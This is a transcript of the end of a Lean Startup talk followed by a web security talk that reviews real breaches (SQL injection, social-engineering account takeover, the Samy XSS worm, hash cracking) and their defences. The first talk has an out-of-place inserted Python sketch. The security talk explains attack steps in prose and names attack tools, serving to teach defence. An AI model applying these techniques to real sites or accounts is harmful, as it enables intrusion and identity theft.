Silicon Valley. I'm so sick of people saying that they're pivoting. That's just a nightmare. It's like: oh, I had an idea this morning. Then over lunch I thought about it and I pivoted. I pivoted my business idea twice today. As if that's some sort of badge of honor. I pivoted twice! You didn't pivot, you changed your mind.
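Going backwards through the loop can even be written down mechanically: state the hypothesis, the metric, and the data that would kill the idea before building anything. Here is a toy sketch of that discipline; the product, metric, and threshold are all hypothetical examples, not anything from the talk's companies:

```python
# Toy sketch of hypothesis -> metric -> experiment, defined before any building.
# The product, metric name, and kill threshold are hypothetical.
from dataclasses import dataclass

@dataclass
class Experiment:
    hypothesis: str        # what we currently believe
    metric: str            # the number we will actually measure
    kill_threshold: float  # below this, the hypothesis is falsified

    def evaluate(self, measured: float) -> str:
        # The decision rule is fixed in advance, so a bad result
        # can't be rationalized away after the fact.
        return "persevere" if measured >= self.kill_threshold else "stop or pivot"

exp = Experiment(
    hypothesis="Students will sign up for a study-guide game",
    metric="landing-page signup rate",
    kill_threshold=0.05,
)
print(exp.evaluate(0.02))  # measured 2% signups -> "stop or pivot"
print(exp.evaluate(0.30))  # measured 30% signups -> "persevere"
```

The point of the sketch is only the ordering: the kill threshold exists before the build, which is what distinguishes a pivot driven by data from simply changing your mind.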
Changing your mind is not pivoting. Pivoting means you learned something from the customer and you adapted your business model based on that information. It doesn't mean you just changed your mind or had a bad day and thought it was silly and threw it away and started a completely different business. That's just ridiculous. Very much in Silicon Valley, we've got levels of hype there, but the real Lean startup stuff happens when you start practicing. It happens when you build MVP after MVP after MVP after MVP. You cannot expect that you're going to build a successful business the first time out. In fact, in Silicon Valley, if you haven't failed at least once, they would consider you kind of not serious about entrepreneurship. When I moved back to Silicon Valley five years ago and I started a business, how many letters do you think I got congratulating me for quitting my job and starting a business? How many? Huh? 500. You're 500 off. Exactly, 1,000. No. Zero. Nobody did. I mean, it was also the middle of the financial crisis, right? So people thought I was crazy. In fact, I was crazy. It was a terrible idea. But nobody congratulated me on starting that business. However, when I shut that business down six months later and posted a blog post where I proudly announced this is why we're shutting down, we learned this, we ran these experiments and this is a bad idea. Don't do this idea. Or if you do this idea, learn from what we did. And I got congratulation letters for years afterwards. People still come to that blog post and they're like, oh, this is awesome, I'm interested in this area, would you mind if I pick your brain for half an hour over coffee? People still do that. It's a very vibrant culture of accepting failure. That's something that's tough to develop in an innovation ecosystem, but it's very important. It's necessary. You have to be willing to stand up and say, you know what, I tried this and it didn't work.
But I'm willing to try again. That's kind of the painful part about this. Exactly. It's traumatic, especially in a lot of other cultures in Mexico and Japan, particularly like, oh, if you failed as an entrepreneur, you're going to have a tough time getting rehired. But it's changing. If you're hanging out with people who don't accept the fact that you're going to quit your job and do a startup for a year, and that's okay, and if it doesn't work, oh well. You're hanging out with the wrong people. Doing a startup kind of sucks. Most of the time you're going to fail. In fact, most of the experiments you're going to run, most of the experiments you're going to run, they should fail. If all the experiments you run succeed, you're learning nothing. You're just validating your own, oh, I was right every time. It means the experiments you're running are not very risky. If you fail all the time, you're also learning nothing. You're just clearly, I don't know what you're doing. You probably just installed your Google Analytics wrong. That's probably the answer. About half of your experiments should fail. Half of them succeed. That means you're making progress. And of course, the other thing I hear in many ecosystems is like, oh yeah, well that wouldn't work here because we're Norwegian. We're Swedish. We're Mexican. It won't work for my idea because it's a two-sided market because there's a network effect. It's all bullshit. Every single time people say, oh, I could never go out and talk to customers because people in our society don't accept it when you approach them on the street. It's nonsense. Every single time we do this, we challenge people to go out and talk to customers. It works in Switzerland. It works in Ramallah. It works in Beijing. It's not a problem. And I guess the last thing I'll quickly note, the other objection I hear is, of course, the corporate objection. Oh, we do lean startup. We do agile development. We iterate very quickly. We do that. 
My friend David has a name for that. He calls it water-scrum-fall. Right? So when the designers are iterating very quickly and then they hand it off to the engineering department that iterates very quickly and then hands it off to the marketing department that iterates very quickly, the entire thing is still taking one year to build, but hey, we're all doing agile. Right? Like, that's working fine. Like, this is a very typical scenario. This is not lean startup. This just leads to death, death of the product. Not very useful. So you have a choice. You don't have to do lean startup. You don't have to listen to any of this. You don't have to do smoke tests. Nothing like that. Your choice is whether you want to learn quickly, or whether you think your idea is perfect and there's nothing to learn and it will emerge fully formed from your brain like Athena from Zeus's head. Like that's fine. You have a choice. This sort of thing is hard. Doing startups is hard. I mean, doing a startup essentially is going through the repeated pattern of getting excited about something, trying something, seeing it utterly fail and getting depressed. If you're doing a startup and you haven't wept yet, like openly wept in your room late at night, going this was the dumbest idea of my life, I should never have done this, you're probably not doing it right. Like it sucks. And lean startup is even worse. Lean startup is saying not only do I want you to try something, put all your effort, put all your dreams into it and then watch it fail, but I want you to do that repeatedly. I want you to do that repeatedly every night. I don't know about you guys, but if I go to the bar and I see my dream and I try and approach my dream and my dream says no, go away, like that's bad for me. I can maybe do that one or two times a night and then it's time to head home. I'm sorry guys, I'm done for the evening.
It's the same process. And now you want to tell me I should do this 200 times a night? This is horrible. It is a traumatic experience. The only way you can survive this experience is by changing your definition of done. Your definition of done is not I wrote code. It's not even I got customers. It's I made progress because I learned something today. I learned something in this startup that I can take to my next startup. I learned a skill today. This is a skill. Creating a business is a skill. Running experiments is a skill that scientists take years to perfect. Figuring out how to do the perfect control group. You have to do it over and over and over again. And if you can change your perspective from I finished, like TDD, I'm done, my test passes, or BDD, I wrote my cucumber spec and it passes, to hypothesis-driven development: I had an idea, I tested it, it worked or it didn't work, but I learned something either way. So if we can change our definition of success from I finished coding to I actually learned something that will help me in the future, like that's success. And that's what Lean startup is about. So that's all I got. I'm happy to answer questions from you guys. I'm happy to do a dance. No, I'm not happy to do a dance. Sorry. Scratch that. Anybody have any questions about this? We have like five minutes for questions or should we call it? Yeah? I'm actually really hungry. So if your question is when is lunch, I'm perfectly happy to answer that by saying now. No? With the landing page test. So the question is with a landing page test, are you testing your marketing mechanism rather than the idea itself? And the answer is yes. But that's kind of the point. If I can build an amazing product but I have no way of getting that to the customer, so what? I mean, Bill Gates has been working on this problem for years. We have wonderful vaccines. We know vaccines work. But we still have cases of polio, and smallpox, well, actually probably not smallpox at this point.
But polio is making a resurgence. Why is that? We have no delivery mechanism. We can't get these vaccines to the places they're actually needed because they get too warm in transit and they expire. And they're useless. The delivery mechanism in that case, the distribution channel, not even the marketing channel, is the critical thing. We need to look at our business, establish what's the risky part of it, and test that. And if you have no way to get to market, that's a pretty risky hypothesis. You really ought to test that. So yes, you are. In fact, one of the things I prefer to do is when you're doing a smoke test, you split it into two tests. You do what I call a comprehension test and then you test whether or not people will click through on the value. Because if people can't understand the value proposition, then the conversion rate on your landing page is meaningless. So if I say I've got a landing page, this landing page will cure plantar fasciitis. How many people know what plantar fasciitis is? One, two. And so for the rest of you, I have a website. If you have foot pain, particularly in the morning, this will cure that. Everybody understand that? Yes, OK. So we have to talk in language that the customer understands. That's the idea of a comprehension test, and it can be done very simply just by asking somebody, here's my value proposition, please explain it back to me. Very, very simple. What was the other question? No, that's OK. I was just wondering if there's really no one who can do that. Yes. Well, sorry. OK, one person did, but that's my mom and it really doesn't count. Question. OK, can you do lean for mission-critical systems? So lean for mission-critical systems. So definitely not my area of expertise. There's actually somebody giving a workshop Thursday, Mary Poppendieck, who's particularly good at this. I mean, if you know the value that you're trying to build, lean is not the most appropriate thing, right?
For mission-critical systems where you really know exactly what you need to build, agile is probably the approach you're going for. So the thing about lean is it's for when we don't know, like, all right, now we should test marketing and test the business model canvas and test all of those things. So there are ways to break this down; something like concurrent set development is a wonderful way of doing mission-critical development. The US Navy developed the Polaris submarine using concurrent set development. When the Russians back in, I guess this was the 70s, early 70s maybe, they launched a submarine that could actually launch its nuclear weapons underwater, so it avoids the risk of that vulnerable point where the submarine's on top of the water and can be attacked. The Russians launched that surprisingly, and the US plan was an eight-year plan to develop that thing. They were like, uh-oh, big problem, particularly in the middle of the Cold War. They used concurrent set development. They broke it into three teams and said to one team, you guys go off, strip this down to the minimal feature set and build that. You guys go off, take that entire eight-year plan and do it in one year. I want all of it done in one year. And you guys in the middle, you take kind of a middle feature set. And then all those teams, day to day, week to week, they exchanged learnings and knowledge. They started to understand like, well, if we take this engine type, we're going to encounter these problems. You guys who are trying to do the whole thing, like, oh, wait, if we do this engine type, we're going to encounter different problems. And we do things like we try and delay decisions until the last possible moment.
We'll try and delay the decision of what engine type until we see three teams trying three completely different engine systems to resolve the issues of their feature set, and then plug in the engine that makes the most sense and exchange that knowledge across the teams. Again, this is not my area of expertise. Mary Poppendieck has a wonderful book called Lean Engineering, I think, where she talks a lot about concurrent set development. So I think that's a very good one to read if you're interested in that. But the mission-critical part of your business as a startup is: does anybody want my product at all? Other questions? Okay. Then I thank you very much. I wish you a very good lunch. And I wish you would all quit your jobs and do a startup. Sorry, everybody.
Lean Startup has given us a lot of new buzzwords. What is it doing to change the way we work? Are we just building more junk faster? We will go through real examples of a well-executed lean startup and some typical pitfalls in order to point out the differences between those playing buzzword bingo and those who are really building something meaningful in a lean fashion.
10.5446/50647 (DOI)
All right, welcome everybody. Sorry about our little technical dramas there. You're losing about 10 pixels of my right-hand side, but that's not going to matter. So hello, everybody. My name is Troy Hunt. I'm from Australia. I'm going to talk more about Australia on Friday. I've got another session on Friday that's going to go into a lot of detail about some attacks. We're going to break some stuff on Friday. But today I want to talk about a bunch of attacks that we've seen in the past, how they've worked, and what we can learn from them, what we can do differently in future. And where I like to try and start these talks is to take a little bit of a look at why it is that we're bothering to talk about web security. So I have this slide where I put a whole bunch of company logos on. And every time I do this talk, the logos have to get smaller and smaller and smaller because there's so many more of them. So I've got things like eBay from a couple of weeks ago. Didn't have that last time I did this. So it's an ever-expanding list. And what I find really interesting about this list is the diversity of organizations that are represented. So we're seeing everything from shopping centers to telcos to military contractors like Lockheed Martin. I'm not sure what things like prong.com are, but there's a really broad range of websites that are represented. So it's not discriminatory in terms of who's getting attacked. Also not discriminatory in terms of why people are getting attacked. If it's on the internet, it's pretty much fair game. So before I jump into the actual attacks themselves, one thing that I think is quite interesting is the way attacks are changing in terms of scale and volume. And one of the things that I find really stark is this graph here about attacks over time. So this goes from about April 2010 through to about the middle of last year.
And I picked this range because I did a course on this recently for Pluralsight in terms of the changes between versions of the OWASP Top 10. Is anyone here familiar with OWASP? Just a show of hands. And it's maybe a third, not too bad. So just a quick diversion. OWASP is the Open Web Application Security Project. They're a not-for-profit organization. And they create a bunch of material to help us build safer websites. And one of the things they create is a document called the Top 10 Web Application Security Risks. And it talks about things like SQL injection and cross-site scripting, how they're executed, how to protect yourself against them, and how to do it in different languages as well. So a lot of the stuff that I talk about and write and create material on is around OWASP. So I'm going to come back to them a few times. So anyway, this was the difference between web security in the OWASP 2010 version and the OWASP 2013. And what I was trying to show is just how much the attacks are increasing. So up until about the middle of that graph, we're under about 100 different attacks a month. Get through to the last half and now we're up around that 250-plus mark. So we're seeing a lot more. This data is from datalossdb.org. It's a great site for listing breaches that have occurred, and it explains who did it and how they happened. It also only explains the ones we know about. So there's 6,000 breaches there that they've recorded that we know of. There's a hell of a lot more that we don't know of. Now one of the other interesting things beyond just the volume in terms of the number of breaches is the amount of data that gets disclosed and compromised in each one of those breaches. So what we're seeing here is that the records that attackers are getting their hands on are increasing dramatically. 822 million records last year, nearly doubling the previous high. So that's really significant. We're getting towards a billion records there in 2013 alone.
So think of some of the big ones. In 2013, everyone probably heard Adobe got attacked. 152 million accounts from Adobe alone. Most people know Target had huge issues. 110 million credit cards in 2013, in about December. And already this year we've got eBay. So eBay says we've had 145 million active users compromised. But they don't tell you how many inactive users. I don't know how many it is, maybe 300 million. It's a lot, significantly higher than 145. So we might find that 2014 is the bumper year in terms of data breaches. So last thing before we get into some of the attacks. And this sort of looks at what were the top 10 breaches in terms of the records that were compromised and when did they happen? And there's an interesting little pattern here. When you have a look at the dates, five of the top seven were in the last 10 months. So that's massive. This is tracking stuff that goes all the way back to the 80s. But five of those top seven attacks happened since August last year. So we've got this problem where there are more and more and more attacks and they're getting bigger. Each one is getting bigger. And again, 145 million from eBay, plus all the other ones they don't tell us about. All right, so let's jump in. We're gonna look at 10 different attacks that have happened over recent years, happened online, and we're gonna look at how they happened and what we can do to stop them from happening again. So the first one, a pretty simple, run-of-the-mill SQL injection. This is Bell in Canada. This is a telco in Canada. Earlier this year, they got popped by a SQL injection attack. And what ended up happening was about 22,000 records were compromised, no cryptography at all on passwords, no encryption, no hashing. Very important difference between those two as well that we'll talk about on Friday. Now, so we've got 22,000 records, they all get exposed, and because they're hacktivists, what do hacktivists do? They whack it all on Pastebin.
And of course, this is terrible for a company because not only did they get hacked, but now all their users' credentials are somewhere public. Now we know it was SQL injection because the attackers told us it was SQL injection. They posted a really nice screen grab. The thing about hacktivists, they love telling you how they did it because it's so intelligent, it's so clever. Look at what I did. This is a free plugin for Firefox called Hackbar. And what Hackbar lets you do is do a little bit of fuzzing on HTTP requests. So what I mean by that is that you go to a website, you make a legitimate request. So this is a password recovery page. It was making a post request which inevitably has something like the email address you want to recover the password for. I really hope they didn't actually just email the password, but I reckon they probably did because they're all in plain text anyway. So anyway, you make the request and then you use Hackbar to capture that request, manipulate some of the parameters and see if you can get the web application to actually throw some exceptions. Now in this case, we can see down below it is actually throwing an exception, Microsoft OLE DB provider. And it's giving a conversion failure, where what's actually happened is the attackers have tried to get the version of the SQL server. And we can see it is Microsoft SQL Server 2008 R2, blah, blah, blah, and they've cast it to an integer. Now it's a string, so why cast it to an integer? It's got lots of letters and things that really aren't conducive to an integer. So SQL Server's thrown an exception, and the exception has bubbled up into the web browser and disclosed the fact that this is what the database is. That doesn't sound too bad, but that technique is then used to get the table names and the column names and the data. And if that sounds hard, on Friday, I'll show you how any of you can do it with your own websites. Very, very simple.
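The underlying flaw that makes this whole class of attack possible is untrusted input concatenated straight into SQL. Here is a minimal sketch using SQLite; the table, column names, and data are invented for illustration (Bell's actual system was SQL Server behind classic ASP), but the vulnerable pattern and the parameterized fix are the same everywhere.

```python
import sqlite3

# Toy database standing in for the breached one; names and data are invented.
conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (email TEXT, password TEXT)")
conn.execute("INSERT INTO users VALUES ('alice@example.com', 'hunter2')")

def find_user_vulnerable(email):
    # Untrusted input concatenated straight into the query: the classic flaw.
    query = "SELECT * FROM users WHERE email = '%s'" % email
    return conn.execute(query).fetchall()

def find_user_safe(email):
    # Parameterized query: the driver treats the input as data, never as SQL.
    return conn.execute("SELECT * FROM users WHERE email = ?", (email,)).fetchall()

payload = "' OR '1'='1"  # classic injection string
print(len(find_user_vulnerable(payload)))  # 1 -> the payload matches every row
print(len(find_user_safe(payload)))        # 0 -> the payload matches nothing
```

The error-based trick he describes (casting the version string to an integer so it leaks through the exception) is just one way of exploiting that same concatenation; once input can become SQL, the attacker chooses what SQL it becomes.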
So there's a few things that we can take away from this attack. And the first thing is SQL injection is the number one attack on the web. And it's the number one attack for a few different key reasons. Number one is it is really, really prevalent. There is so much SQL injection out there, it is not funny. And one of the things I'll also do on Friday is show you how to find sites with SQL injection and just how easy it is just via Google search. So number two is that it is extremely easy to exploit. If you can copy and paste, you can mount a SQL injection attack because there are free tools that just make it dead, dead simple. Because it is so simple, that's why we see kids turning up at court with their mums who are always really pissed that their kids have been hacking websites. And it's these kids that don't necessarily know anything about SQL injection or web security, but they know how to run these free tools. Now, the third thing is the impact is really, really high. So if you get all your data exposed publicly, or your customers' passwords, for example, that is a massively high impact. Cross-site scripting isn't great, but it's a much lower impact than something like SQL injection. So we're also seeing a lot of automation. So I mentioned that there's a tool that I'll show on Friday, a very easily available tool. You copy, you paste, you put in a link, and you hack a website. I could teach my three-year-old how to do it, that's how easy it is. Now, unfortunately, we do have these problems because as developers, we're doing some pretty sucky things with the web. We're building these vulnerabilities into the applications. Now, we know about these things. They're in OWASP, they're very well documented. We've all seen the news about how many websites get breached. But we do keep building the same risks.
Now, the other thing you wouldn't have seen, possibly wouldn't have seen on the previous slide, is the URL had a .asp extension, classic ASP. This is the thing that was done 12 years ago. We replaced it with .NET. It was from a much more innocent era. It's not designed to be as resilient to these sorts of attacks as things like modern ASP.NET and other modern frameworks. So running on technology that old is always gonna make things harder. It's always gonna put you behind the eight ball. So that was SQL injection. The next one I'll talk about is Matt Honan and his epic Apple hack. Now, Matt was a reporter for Gizmodo and Wired. And Matt got up one day and his iPhone powered down and consequently wiped itself, which is never good. And what eventually came out was that the attackers had managed to compromise his Apple account. But how they did it is the interesting bit. So the attackers called up Amazon and they said, hi, I'm Matt. I would like to put a new credit card on my Amazon account. And they go, okay, cool, what's your name? What's your email address? What's your physical address? So three pieces of data. And then they go, okay, cool, give us the credit card and we'll put that on your account. So they do that. And then the attacker calls up the next day and says, hi, I'm Matt. I'd like to change the password of the account. And they go, okay, well, to do that, we need your name, your address, and your credit card number. Oh, interesting. So you can actually call up Amazon, or you could at the time, and set a new credit card and then call them back and say, I would like to verify my identity by giving you the information that I just gave you yesterday. So that allowed him to get access to that Amazon account. Now, once he had the Amazon account, he could then go through and find the last four digits of Matt's other legitimate credit cards. Not the whole thing, because that would be insecure.
But he could go in and see the other cards and all of us can do this on many of our accounts. Go in there and your card ends in three, two, one, five, whatever it may be. You can get those last four digits. Now, with those last four digits, the attacker could call up AppleCare and say, oh, funny thing, I forgot my password. And they go, all right, well, what's the last four digits of your credit card? Glad you asked. Here we go. So you see how he's starting to jump from one service to the other. So once he's in AppleCare, then you're into iCloud and you're into Apple's ecosystem because he's got that account. So he managed to get a temporary password, get access to the Apple account, and once you got access to the Apple account, you can start doing things like wiping devices. And we'll have a look at that in this demo as well today. So he's wiping devices. The other thing about Apple is Apple has the me.com email service. And Matt unfortunately used me.com as a password reset channel for his Gmail. So you forget your Gmail password. You add a secondary account that they can send a reset to. So he managed to reset Matt's Gmail account. So once you can reset the Gmail account, he can get into there and then he can do things like reset the Twitter account, which apparently was the ultimate goal to begin with. And the attacker went and sent a whole bunch of racist tweets and then deleted the Gmail account as well. So it didn't end up real well for Matt. And as Matt puts it, it only took an hour. His entire digital life was destroyed because the attacker basically just had four digits of a card number. So pretty nasty stuff. There's a few interesting things with that. And the first one is, and we're gonna see there's a bit of a theme today, the interlinking of accounts can be really problematic. So the fact that the attacker was able to explore the vulnerability with Amazon's verification system ultimately meant that he could take over the guy's Twitter account. 
I mean, that's several hops. But because we have all these things so intrinsically linked together, it often leaves us more vulnerable. There are also different views of the sensitivity of the data from different companies. So Amazon was happy to just accept something like a card and then read it back to you. But Apple, that's their verification process. So Apple had a very, very high level of sensitivity on those last four digits of the card. And it's probably got you thinking now, how many places have I got four digits of the card? If it's four digits, it doesn't come under PCI DSS, it doesn't all have to be encrypted. You can read display it back to people. It's on a lot of your receipts. Go through the garbage bin. You'll find a lot of four digits. Now the other thing is, and this was a couple of years ago, so a little bit before two-factor authentication became really popular, but there was no two-factor authentication on the Gmail account, on the Apple account, on the Twitter account. So there was no second channel beyond just knowing the passwords. That's all they take in need of the password. So where you have two-factor available, turn it on. So Apple and Twitter, I mentioned things like GitHub. A lot of people here probably use GitHub. They've got two-factor authentication. They've had brute force attacks against people's accounts. You definitely want to have it on there. And of course, the other thing is, is that as people, we are vulnerable to social engineering. A lot of security professionals say that really the people are the biggest problem. We can only do so much with the systems, and the systems will pretty much do what we tell them to do, but the people are the one that keep getting exploited by the attackers. And there are many, many different ways that we can socially engineer them. We'll have a look at a couple more throughout this preso. So who remembers MySpace? It was a thing. Some time ago, it was the thing. 
It was the thing in 2005 when a bloke called Samy decided he needed some more mates. Now, for most of us, we'd try and be popular and we'd try and socialize a little bit and maybe do things that other people are interested in. But Samy was a bit of a gun with cross-site scripting. And he decided it would be much more effective if he wrote a nice self-propagating cross-site scripting worm. Now, what it meant is he could write this worm with a whole heap of XSS. He could put it on his MySpace page. Someone comes along, they look at the MySpace page, and they automatically befriend him because there's script that he's put on the page which fires off the request to actually befriend the guy, and it puts a message on the person's page that says, but most of all, Samy is my hero. So this was great. So people that came and saw his profile would get that on their page. But because he was a smart guy, everybody who then came and viewed their pages also got compromised. So it kind of spread. It hit a million people in less than 24 hours. That is a very, very bloody effective cross-site scripting attack. And it looks like this. So clearly cross-site scripting can actually be rather complex. Now, the idea is not to read what's in here, but it's to make a point that this is actually pretty sophisticated. Now, this was 2005 as well. So we've well and truly moved into the space of much more sophisticated cross-site scripting attacks since then. So that was an interesting one. And it told us a few really interesting things. And one of them is that cross-site scripting is very serious. So a lot of the time when we do maybe a proof to demonstrate that a site is at risk of cross-site scripting, we'll pop up an alert box. Hey, follow this link. Oh, alert. Funny cats, whatever it may be. There's actually a Twitter account called XSSKittens. And it posts all of these links that exploit reflected cross-site scripting.
You click on them, you go to a shopping website, and there's cats all over it. And he just goes nonstop because there's so much stuff out there at risk of XSS. But it can be very serious. So other proofs we often see for XSS do things like taking a copy of authentication tokens in cookies and sending them off to an external service, because the cookies weren't flagged as HTTP only, and the XSS was possible on the site because they weren't encoding and all sorts of other things. So it can actually be very, very serious. I mentioned before, it's also in the OWASP Top 10. It's number three in 2013. It was number two in 2010. So it's gotten kind of a little bit better. But it's still a serious, serious problem. Now, protecting against XSS is also very easy. And this is sort of a common theme. Things like SQL injection and XSS, it's not hard to stop them if you know what to look for. So a couple of things there make it very easy to protect against XSS. One is validating untrusted data. So when a user provides a URL, or say query string parameters, or when they submit a form, or when you read request headers, when you read the language of the browser, or when you read the user agent, all of that is untrusted data. And validating that it conforms to an expected pattern is really important. In the one we'll have a look at on Friday, you can take integers and start attacking via integers, because they're not actually checking that when the integer goes to the website, it is actually an integer. They just go, oh, look, data. We'll take that and we'll put it in our query. Encoding all output is the other big thing. So frameworks like ASP.NET MVC do a very good job of encoding by default. So what I mean by that is if you try and send a script tag to the site and the site reflects it back, so like when you do a search and it says you searched for, instead of actually rendering script tags into the HTML source, it'll encode it.
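That encoding step can be shown in a few lines with Python's standard library; it's a stand-in here for what frameworks like ASP.NET MVC do automatically when rendering, and the payload string is just an example.

```python
import html

# A reflected search term containing a script tag, exactly the XSS probe
# described above.
untrusted = '<script>alert("xss")</script>'

# Output encoding: the markup characters become HTML entities, so the
# browser displays the text instead of executing it as script.
encoded = html.escape(untrusted)
print(encoded)
# &lt;script&gt;alert(&quot;xss&quot;)&lt;/script&gt;
```

The important property is that encoding happens at output time, for every reflected value, not just the ones you suspect are dangerous.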
So you get &lt; for less than and &gt; for greater than, and then in your browser, you actually see rendered script tags. So they're really two very, very simple things. And again, a framework like MVC does it for you automatically. A framework like classic ASP doesn't. That's why every time you see a dot ASP extension, almost for sure you'll find SQL injection, you'll find cross-site scripting. Very easily done. All right, so HB Gary Federal. Now this was an interesting one because these guys were security professionals and they were providing services to the US government. And the bloke running that, Aaron Barr, was very proud of the fact that he believed that he had unmasked Anonymous, the ringleaders of Anonymous. And he made the mistake of telling them that he thought that he had unmasked them, and they didn't take too kindly to that. So they hacked them. And the way they did it is they found a SQL injection vulnerability in the content management system of their website. This may have been one that was known already. It may be one that they found on their own. Either way, they managed to get credentials out of the database. And again, it can be really, really easy to do this. So they got usernames, emails, and they got hashed passwords. MD5 hashed passwords. MD5 hashed passwords are useless. Salted SHA1 hashed passwords are useless as well. And if you're doing that, we're going to have a look at that on Friday and we're going to break a heap of them and probably upset a bunch of people. But you need to see how easy it is to break bad hashing implementations of credentials. Now, because it was just an MD5 hash, the attackers could use rainbow tables to convert the hashes back to plain text. Well, they don't really convert them. But what they do is they take these pre-computed tables where it says, for all these plain text strings, these are the MD5 hashes.
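A toy version of that lookup fits in a few lines of Python. Real rainbow tables use chained hash-reduce steps to trade time for space, but the effect on unsalted MD5 is the same; the candidate passwords here are obviously made up:

```python
import hashlib

# Precompute hashes for candidate passwords -- in practice these tables
# cover billions of candidates and are downloaded, not built on the fly.
candidates = ["password", "letmein", "summer09", "monkey12"]
table = {hashlib.md5(p.encode()).hexdigest(): p for p in candidates}

# "Cracking" an unsalted MD5 hash is then just a dictionary lookup.
stolen_hash = hashlib.md5(b"summer09").hexdigest()
print(table.get(stolen_hash))  # → summer09
```

No brute force involved: if the password is common enough to be in the table, it falls out instantly.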
And then it just matches the hashes with the ones out of the database and says, well, that must have been the password. Now, as the CEO of a serious security firm, clearly he had a very good password, which is this one just here, which is all lower case with two numbers. And because it makes life really, really, really convenient, he reused it across everything. So that wasn't good. So there, the attackers have the password in plain text and it's reused across every account. So that allowed them to do things like gain shell access to the Linux machine that their web application was running on. And then because these guys weren't actually patching their environment, exploit a risk that had been publicly disclosed and patched months earlier, elevate privileges, and start pulling down gigabytes and gigabytes of emails and other documents and things like that off this public website. Now, the guy behind all that was this bloke, Sabu, which was the handle he went under, the leader of LulzSec. Now, this guy is a very, very old hacktivist. He was actually in his late 20s. So very, very old for a hacktivist. But a bunch of his mates were teenagers that did end up in court. Sabu ended up being caught by the feds. He got turned, he became a snitch. He then allegedly helped them bring down 300 other attackers or potential attackers. And in fact, just a couple of weeks ago, he finally was released with a suspended sentence after effectively having his life ruined because he liked SQL injecting some websites. So that didn't end up well for him. Didn't end up well for HB Gary either. Obviously as a security organization, if you do these sort of things and get caught, it's probably not real good for your reputation. Now, a few different things that we can take away from this. And a little bit like the Matt Honan thing before, security risks do tend to be chained. And in this case, there was a lot of pivoting.
So they'd break into one system via a SQL injection attack and then get enough information to move onto the next, and then get enough information to move onto the next. And we often see this happen. And one of the reasons why that's important is because I'll often hear people say, and I'll take an example, it might be that they've got a SQL injection risk in the admin section of their website. And they go, it's not really a problem because you've got to be logged on as an admin anyway. So, you know, it's okay. But it's this whole thing of not having these single points of failure. Because all of that assumes that the attacker can't get into the admin system. One person reuses a password, it gets published, the SQL injection gets exploited. So it's about having defense on top of defense, defense in depth. Again, we know these risks. So we know things like SQL injection. And we particularly know things like bad cryptographic storage. Using MD5, bad. Using salted SHA1, bad. Again, I'll show you why on Friday. It's unbelievably easy to crack that. Choosing bad passwords. So it's probably obvious, but somehow we keep doing it. And even the security pros are choosing weak passwords and reusing weak passwords. And that is just opening up this treasure trove of other stuff that attackers can get their hands on. Now, the final thing about these hacktivists is that they're often young. They're often clever, maybe not particularly intelligent, but they're very, very resourceful. And when you don't have a job and you live with your mum, you've got a lot of time on your hands, so they can find ways into these systems. And it's interesting when you look at the sort of discussions these kids, and often they are kids, legally, not even 18. You look at the sort of discussions they're having. So I've done some videos on things like automated SQL injection.
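For what it's worth, the defence against everything those automated tools exploit is mostly one habit: parameterize queries instead of concatenating strings. A minimal sketch with Python's sqlite3, just to show the mechanism (any database driver has an equivalent):

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (id INTEGER, name TEXT)")
conn.execute("INSERT INTO users VALUES (1, 'alice')")

user_input = "1 OR 1=1"  # attacker-controlled "integer"

# Vulnerable: the input is concatenated straight into the query, so the
# WHERE clause becomes "id = 1 OR 1=1" and matches every row.
bad = conn.execute("SELECT name FROM users WHERE id = " + user_input).fetchall()

# Safe: the value is bound as a parameter, never parsed as SQL.
# The whole string is treated as one value, which matches nothing here.
good = conn.execute("SELECT name FROM users WHERE id = ?", (user_input,)).fetchall()

print(bad, good)  # → [('alice',)] []
```

Combined with validating that an "integer" from the outside world really is an integer, that one change kills the entire attack class.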
And when I'm Googling around trying to find information, there's all these other videos that people have made about how to use tools like Havij and sqlmap. And it's just telling that every time the people on the videos have voices that haven't broken yet. True story. So they have a lot of time on their hands and they can be very resourceful. All right, Sony. So Sony had a really, really bad time of it in 2011. And they just kept getting attacked and attacked and attacked and attacked. And a lot of this started with PlayStation Network. So PlayStation Network went offline and everyone was like, where's PlayStation Network? And Sony just doesn't say anything. It just goes on and on and on. A week later they go, oh yeah, we got hacked. So it was quiet for a long time. We've been hacked but it's okay. And then they got hacked again. So the first time was about 77 million accounts. The second time was about 25 million accounts. So they were starting to have a very, very bad month of it. This was only a couple of weeks later. But it's okay, we've got it under control. Then they got hacked again. And this time it was Sony Pictures. Now what's interesting about this is that Sony Pictures is not PlayStation Network. This is a very different part of the organization. This is now getting into production and film studios and things like that. So clearly there was something about Sony that led to them continually getting owned over and over and over again. Now several very interesting things came out of it. And one of them is that communicating early was really important. And these guys just weren't doing it. There are literally people sitting around going, what the hell's happened? I need my PlayStation, it doesn't work. And they weren't telling people. Even eBay two weeks ago, just in the last couple of days I've had people tweet me saying, oh, eBay finally told me they got owned and I need to change my password. What, does it take two weeks?
I mean, I know that they've got a huge audience but they've got a lot of resources and a lot of systems behind that. So think about it for yourselves as well. For the systems that you manage, if there is an incident and none of us can assume that we'll never have an incident, if you've got a million customers, are you equipped to actually get them communication fast and early? You know, can you do it in a day or two? Are we gonna be sitting here in a week going, we're still trying to figure out how to email 20 million people? Because that can be a difficult problem to solve. Now with Sony, it was also pretty cultural. So we're looking at very independent parts of a global multinational, developers in different places, systems in different places, different technologies. Hell, it's PlayStation versus a little website somewhere for a promotional campaign. But they all kept getting owned. So clearly there was something in the organization that just didn't have a focus on security. Maybe they didn't have the training for the developers. Maybe they didn't have security reviews or penetration tests or things like that. But it was a cultural thing and you often see this become a pattern. And I particularly find it interesting, you look at a website after it's been breached and you go, well, yeah, you've got like cross-site scripting and you've got other vulnerabilities and you're returning too many headers and you've got directory browsing. You've got all these sorts of things that may not have been the way the attacker got in, but it's part of the broader picture of, hey, these guys probably aren't thinking a lot about security. A little bit of where there's smoke, there's fire going on. Now for Sony as well, it was also massively expensive. 170 million bucks apparently went in to solving their security problems. And one of the challenges we often have in security is that it's really not viewed as a feature. 
